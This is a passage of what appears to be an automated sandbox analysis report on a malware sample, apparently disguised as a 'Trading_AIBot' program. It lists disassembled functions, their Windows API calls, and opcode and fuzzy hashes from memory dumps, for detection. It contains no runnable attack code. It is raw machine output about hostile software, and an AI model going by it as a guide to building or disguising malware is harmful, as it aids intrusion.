                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                        Function 0040E34F Relevance: 6.4, APIs: 5, Instructions: 181COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                        • GetLastError.KERNEL32(?,0040D212,00000000,00000010,?,?,?,0040D29E,0040AFB2,00421200,0000000C,0040D2CA,0040AFB2,?,0040AFB2), ref: 0040E4CA
                                                                                                                                        • GetLastError.KERNEL32(?,0040D212,00000000,00000010,?,?,?,0040D29E,0040AFB2,00421200,0000000C,0040D2CA,0040AFB2,?,0040AFB2), ref: 0040E557
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4219743298-0
                                                                                                                                        • Opcode ID: 21f6e1cdbb20672dfdd0fe6bd8d933b3c40773d1f4ce881146cc449c7a206cbd
                                                                                                                                        • Instruction ID: 24b6ce6606a44b70c861ee7e64875c3263351e3a18f4392c585e1da245e73565
                                                                                                                                        • Opcode Fuzzy Hash: 21f6e1cdbb20672dfdd0fe6bd8d933b3c40773d1f4ce881146cc449c7a206cbd
                                                                                                                                        • Instruction Fuzzy Hash: 1751D371D00625AACF217FB79C04A6F7A64EF50368B104D3BF854B72D2E73C89518A9D
                                                                                                                                        Function 004142D1 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00414070: GetOEMCP.KERNEL32(00000000,?,004127F1), ref: 00414099
                                                                                                                                          • Part of subcall function 00411C75: Sleep.KERNEL32(00000000,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB,00000001,-0000000F,?,0040E2B2,00000004,00421260,0000000C), ref: 00411C96
                                                                                                                                        • InterlockedDecrement.KERNEL32(CBE85013), ref: 00414347
                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 0041436C
                                                                                                                                        • InterlockedDecrement.KERNEL32 ref: 004143FE
                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 00414422
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 327565842-0
                                                                                                                                        • Opcode ID: 1ac3cf69a75a00068bc07650feaee45903014390a969cb25a4eb59365c4c170b
                                                                                                                                        • Instruction ID: ef8407f637ce398c8a034388d495f59de4d12d861d32ab62094bbbe6976ba705
                                                                                                                                        • Opcode Fuzzy Hash: 1ac3cf69a75a00068bc07650feaee45903014390a969cb25a4eb59365c4c170b
                                                                                                                                        • Instruction Fuzzy Hash: 3C41E570A002149BCB20AF75D9807DA7BF0FF88314F50886BE955EB2A1C77D98C28B5C
                                                                                                                                        Function 00413E39 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(?,?,00000000,?), ref: 00413E5A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID: $bBA
                                                                                                                                        • API String ID: 1807457897-2691998655
                                                                                                                                        • Opcode ID: a75a759ca75c92b4cf3da8d4d8bcebf6a9778298300296b705959df042819b67
                                                                                                                                        • Instruction ID: 52c6045e8425aa0881b7be24359a39c5100ada617ead2fe5fbcefb6b32b9ff45
                                                                                                                                        • Opcode Fuzzy Hash: a75a759ca75c92b4cf3da8d4d8bcebf6a9778298300296b705959df042819b67
                                                                                                                                        • Instruction Fuzzy Hash: 51412AB150075C9EDB218F24CD84FFBBBF89B05709F1444EEE58683182D2799B8A8F59
                                                                                                                                        Function 0040D5AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 0040D5CC
                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 0040D5F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalDeleteSection
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 166494926-1615503679
                                                                                                                                        • Opcode ID: 7526e4d3dbcc190cfac878923c5a31712b949e4b7f11fd427bac071a9b25d37d
                                                                                                                                        • Instruction ID: 9eeb78a0cbe44b7cd63f1801abc478ec2ac12bfb37c42c527eb79f6e2b7b0d99
                                                                                                                                        • Opcode Fuzzy Hash: 7526e4d3dbcc190cfac878923c5a31712b949e4b7f11fd427bac071a9b25d37d
                                                                                                                                        • Instruction Fuzzy Hash: 69F0E2B3D00321B7C7345A596C84567B2A88F9072A395403FDCA8B7280877E8C8886AE
                                                                                                                                        Function 0040DA59 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,00021920,00000000,0040DFB9,00021920,00000001,00000000), ref: 0040DA80
                                                                                                                                        • HeapAlloc.KERNEL32(00000008,000041C4,00021920,00000000,0040DFB9,00021920,00000001,00000000), ref: 0040DAB6
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0040DAD0
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0040DAE7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocHeap$FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3499195154-0
                                                                                                                                        • Opcode ID: 9b5c81dbc51e698318c7dad427188dbb4a23983c96b18bada707d7d15dac696f
                                                                                                                                        • Instruction ID: 0f3031a8d49e428019a005922f7f9a8923364d0b5993188e1ef698a85f99edc9
                                                                                                                                        • Opcode Fuzzy Hash: 9b5c81dbc51e698318c7dad427188dbb4a23983c96b18bada707d7d15dac696f
                                                                                                                                        • Instruction Fuzzy Hash: 9F119072B00700DFC7319F24EC05A167BB5F758721751453AE696E32B0D334584A8F9C

                                                                                                                                        Executed Functions

                                                                                                                                        Function 02B07580 Relevance: .2, Instructions: 161COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 155742f8209d69922c9fbe2bad9ba668aa4972649794ab0961bf879687e8e907
                                                                                                                                        • Instruction ID: e5b2c20f88a78de03eeb0241090e2a83fb92cf49e8c6d61a5d3a44552021c4bf
                                                                                                                                        • Opcode Fuzzy Hash: 155742f8209d69922c9fbe2bad9ba668aa4972649794ab0961bf879687e8e907
                                                                                                                                        • Instruction Fuzzy Hash: D161D335D01218CFDB15EFA4D990AADBBB2FF89304F6085A9D405BB3A4DB34A949CF40
                                                                                                                                        Function 02B07590 Relevance: .2, Instructions: 158COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2cb3c83693d7c24b76baff5e7d087972a0d0623468e3b250ec29e18005b6915e
                                                                                                                                        • Instruction ID: 1597ad5ea238ac173adaa65104ff1fe9d7ddd7995f2bd8b36f79f791db992e66
                                                                                                                                        • Opcode Fuzzy Hash: 2cb3c83693d7c24b76baff5e7d087972a0d0623468e3b250ec29e18005b6915e
                                                                                                                                        • Instruction Fuzzy Hash: 5161D435D01218CFDB15EFA4D990AADBBB2FF89304F6085A9D405BB3A4DB31A949CF40
                                                                                                                                        Function 02B07188 Relevance: .2, Instructions: 155COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: aa22fa87ed31e810503814f7b2cf6240e8ee52d94a1145921326680618d541bb
                                                                                                                                        • Instruction ID: bb41dcd6e9b99dd888ce18e8f8c860cd33bcde4fe555f1aee274ad1498005372
                                                                                                                                        • Opcode Fuzzy Hash: aa22fa87ed31e810503814f7b2cf6240e8ee52d94a1145921326680618d541bb
                                                                                                                                        • Instruction Fuzzy Hash: 8961B274A40208CFDB44DFA8D594A9DBBB2FF89314F1091A9E805AB3A5DB30AC46CF14
                                                                                                                                        Function 02B07E58 Relevance: .1, Instructions: 98COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fcc2fc03a7bbc4c11775b7199c0a6be8f074fc459a168686e0e83f540428f097
                                                                                                                                        • Instruction ID: d582c7cd870da2173ce98d925bfb6a3c990d954dcc2452ab9a6ea62d6f90368a
                                                                                                                                        • Opcode Fuzzy Hash: fcc2fc03a7bbc4c11775b7199c0a6be8f074fc459a168686e0e83f540428f097
                                                                                                                                        • Instruction Fuzzy Hash: 0141CFB0D002889FDB01CFE9D984ADEFFB6BF48304F14846AE419AB254DB74A945CF54
                                                                                                                                        Function 02B07E60 Relevance: .1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3fac0b0c50fdecfca71bb997f555171bbda0da43949feaa81bf001d82e513d26
                                                                                                                                        • Instruction ID: 4d0889b50a59dd3991cad159ed287f6542a9c03757ca2c5b68ad9e0b0f837d7b
                                                                                                                                        • Opcode Fuzzy Hash: 3fac0b0c50fdecfca71bb997f555171bbda0da43949feaa81bf001d82e513d26
                                                                                                                                        • Instruction Fuzzy Hash: 3541CCB0D00288DFDB01CFAAC984ADEFFB6BF48304F14806AE419AB254DB74A945CF54
                                                                                                                                        Function 02B073F8 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Jcr
                                                                                                                                        • API String ID: 0-2794004756
                                                                                                                                        • Opcode ID: 844b29fa56867d625ef075fd72cc6283be64682d1a9475f49fa7814f46bf6d64
                                                                                                                                        • Instruction ID: 8eb46aa748eb103585008fe606ea50d250ba325bbf58646c53276878b0cc1177
                                                                                                                                        • Opcode Fuzzy Hash: 844b29fa56867d625ef075fd72cc6283be64682d1a9475f49fa7814f46bf6d64
                                                                                                                                        • Instruction Fuzzy Hash: 8B41D375E002089FDB08DFA8D594AEEBBF2BF89301F108469E515B73A0DB35A941CF50
                                                                                                                                        Function 02B07408 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Jcr
                                                                                                                                        • API String ID: 0-2794004756
                                                                                                                                        • Opcode ID: b2f1d6ab0f6de41fe4329378c818c74aaddba17187471d8291bf16252dfdff3d
                                                                                                                                        • Instruction ID: 8b01092ae6967004e82265551e6e674a41df90c5dd5b23bd873e30ac290cdc81
                                                                                                                                        • Opcode Fuzzy Hash: b2f1d6ab0f6de41fe4329378c818c74aaddba17187471d8291bf16252dfdff3d
                                                                                                                                        • Instruction Fuzzy Hash: 8441E475E002089FDB08DFA8D594AEEBBF2BF89301F108069E515B73A0DB35A901CF90
                                                                                                                                        Function 02B05348 Relevance: .9, Instructions: 941COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 255e52c4ed22f4e1c1269a1a9f1abf5987b20b746fca7f361b5ab7cf585f3c07
                                                                                                                                        • Instruction ID: 948e03b5130d206e3cda2b3df986967becd9600907b30e7c41394b939ee6cc4b
                                                                                                                                        • Opcode Fuzzy Hash: 255e52c4ed22f4e1c1269a1a9f1abf5987b20b746fca7f361b5ab7cf585f3c07
                                                                                                                                        • Instruction Fuzzy Hash: 51B29D70D112289FDB69EF68C894B9DBBB2BF49304F5085E9D409A73A4DB316E81CF41
                                                                                                                                        Function 02B05358 Relevance: .9, Instructions: 935COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5cba75a1e414a439d4a223be99b243f8b247e3ec647e3295ed08a13a0c34bb76
                                                                                                                                        • Instruction ID: 8b568af344c52cfc1d7ea8d81bf4c0d578af1c90f164a4a2df210a9cc20a28cb
                                                                                                                                        • Opcode Fuzzy Hash: 5cba75a1e414a439d4a223be99b243f8b247e3ec647e3295ed08a13a0c34bb76
                                                                                                                                        • Instruction Fuzzy Hash: C9B29D70D112289FDB69EF68C894B9DBBB2BF49304F5085E9D409A73A4DB316E81CF41
                                                                                                                                        Function 02B00839 Relevance: .6, Instructions: 603COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 22ea2a4167c0be032de49d904e1674cc7239d32ba0c9a10e54fd5e81d0b241d4
                                                                                                                                        • Instruction ID: 58d41125f492cbce27f9a4e6cf4f3b462c6c9beda68f435b2beb62f227797831
                                                                                                                                        • Opcode Fuzzy Hash: 22ea2a4167c0be032de49d904e1674cc7239d32ba0c9a10e54fd5e81d0b241d4
                                                                                                                                        • Instruction Fuzzy Hash: 0F629B74E01228CFDB64EF68D994B9DBBB2BF89305F1084A9D409A7364DB359E81CF41
                                                                                                                                        Function 02B00848 Relevance: .6, Instructions: 601COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f0edc66011471c2c4c0eefe405e9d7ddcb7cc67a0f032a64d4a225f4f96cfbc5
                                                                                                                                        • Instruction ID: b447757c869a8757821c863392c026ae7869a3f6b5b12c4435d91e93e8c65298
                                                                                                                                        • Opcode Fuzzy Hash: f0edc66011471c2c4c0eefe405e9d7ddcb7cc67a0f032a64d4a225f4f96cfbc5
                                                                                                                                        • Instruction Fuzzy Hash: 9F629A74E01228CFDB64EF68D994B9DBBB2BF89305F1084A9D409A7364DB359E81CF41
                                                                                                                                        Function 02B07A79 Relevance: .4, Instructions: 416COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2add62498bfc0ca075e700888fd9f977c3cc0dfae671918fed2a60f0c8815d7e
                                                                                                                                        • Instruction ID: 851e8c3c359809bd8cb247af70feda762b7e45a42d9738d25c3a3a335a36885b
                                                                                                                                        • Opcode Fuzzy Hash: 2add62498bfc0ca075e700888fd9f977c3cc0dfae671918fed2a60f0c8815d7e
                                                                                                                                        • Instruction Fuzzy Hash: DD41E0B0D012889FDB11DFA9D884ADEFFF5AF49300F14846AE404AB2A4CB74A985CF50
                                                                                                                                        Function 02B07099 Relevance: .3, Instructions: 258COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 836d336856dd677ff62d95e132120fb5719d3c6d617f98a193b737ec8d38d7e6
                                                                                                                                        • Instruction ID: 735c5714346aec6c91043909f352039b6d7d09430fd5be5ff7af551ff1d10aec
                                                                                                                                        • Opcode Fuzzy Hash: 836d336856dd677ff62d95e132120fb5719d3c6d617f98a193b737ec8d38d7e6
                                                                                                                                        • Instruction Fuzzy Hash: 5B51E574A40248CFDB45DFA8D994A9DBBB2FF8D314F1090A9E405AB3A5DB30AC06CF14
                                                                                                                                        Function 02B067F0 Relevance: .2, Instructions: 224COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2fb2d36306b4130fa54926f2020e246f11b4f2534a5be9cd2e762b0c1396ee4b
                                                                                                                                        • Instruction ID: 13182d13e97597b35a91d3ca0914cfa94cb7a9271ca33ab1fd3abb924409e7fe
                                                                                                                                        • Opcode Fuzzy Hash: 2fb2d36306b4130fa54926f2020e246f11b4f2534a5be9cd2e762b0c1396ee4b
                                                                                                                                        • Instruction Fuzzy Hash: 77B19B74A012288FDB64DF68C994B9DBBB2BF49304F1085EAD40DA7394DB70AE85CF51
                                                                                                                                        Function 02B065C0 Relevance: .1, Instructions: 109COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 68e46343c6f3259e4cfb185209fbf5de7783d65fc49835dad24c92145c09d6fe
                                                                                                                                        • Instruction ID: 8a09b1b087fb8b1148eac44e888d763333957ff5bdb8d645e1f0fec0a74af981
                                                                                                                                        • Opcode Fuzzy Hash: 68e46343c6f3259e4cfb185209fbf5de7783d65fc49835dad24c92145c09d6fe
                                                                                                                                        • Instruction Fuzzy Hash: 3441CC78D04208CFDB15DFE9E4986ECBBF5AB49304F14806AE829AB394DB346942CF50
                                                                                                                                        Function 02B07D10 Relevance: .1, Instructions: 89COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ed5befaf4e67ebc4d69f70d054f501259387b519b77c3e4fc163a1bdd7bb00cb
                                                                                                                                        • Instruction ID: 487f28a7a81d7ea992731c7655a029194c0cda27b9bb7ba860c249588da67822
                                                                                                                                        • Opcode Fuzzy Hash: ed5befaf4e67ebc4d69f70d054f501259387b519b77c3e4fc163a1bdd7bb00cb
                                                                                                                                        • Instruction Fuzzy Hash: A041D1B0D012489FDB15DFAAD584ADEFFF5AF48304F14806AE414AB294DB74A985CF50
                                                                                                                                        Function 02B077FE Relevance: .1, Instructions: 79COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 186b5e446dabfb7ab6ba002d5a92384f7c4006399ccd71b159c77d266002e990
                                                                                                                                        • Instruction ID: 64e7ee7a5b6e38b9bb44a256d47719eece3e04efdf94d2cb8a3b659646bb36be
                                                                                                                                        • Opcode Fuzzy Hash: 186b5e446dabfb7ab6ba002d5a92384f7c4006399ccd71b159c77d266002e990
                                                                                                                                        • Instruction Fuzzy Hash: A031D275E012098FCB09DBB8C591AEEBBB2AF89304F1098A9D41577394DB35AE41CF60
                                                                                                                                        Function 02B07810 Relevance: .1, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e3f6c93a2f7bd9dd6534a708c0864c876c829d9044fee0c375935cfc1e0e43a5
                                                                                                                                        • Instruction ID: fb67d54d2f40879e679f6ee87525df17e67bf03f0823814423ab6638b55eee18
                                                                                                                                        • Opcode Fuzzy Hash: e3f6c93a2f7bd9dd6534a708c0864c876c829d9044fee0c375935cfc1e0e43a5
                                                                                                                                        • Instruction Fuzzy Hash: 9321C035E012098BCB08DBB9C590AEEBBB2AF89304F5094A9D41577394DB36AD41CFA4
                                                                                                                                        Function 02B051F7 Relevance: .1, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
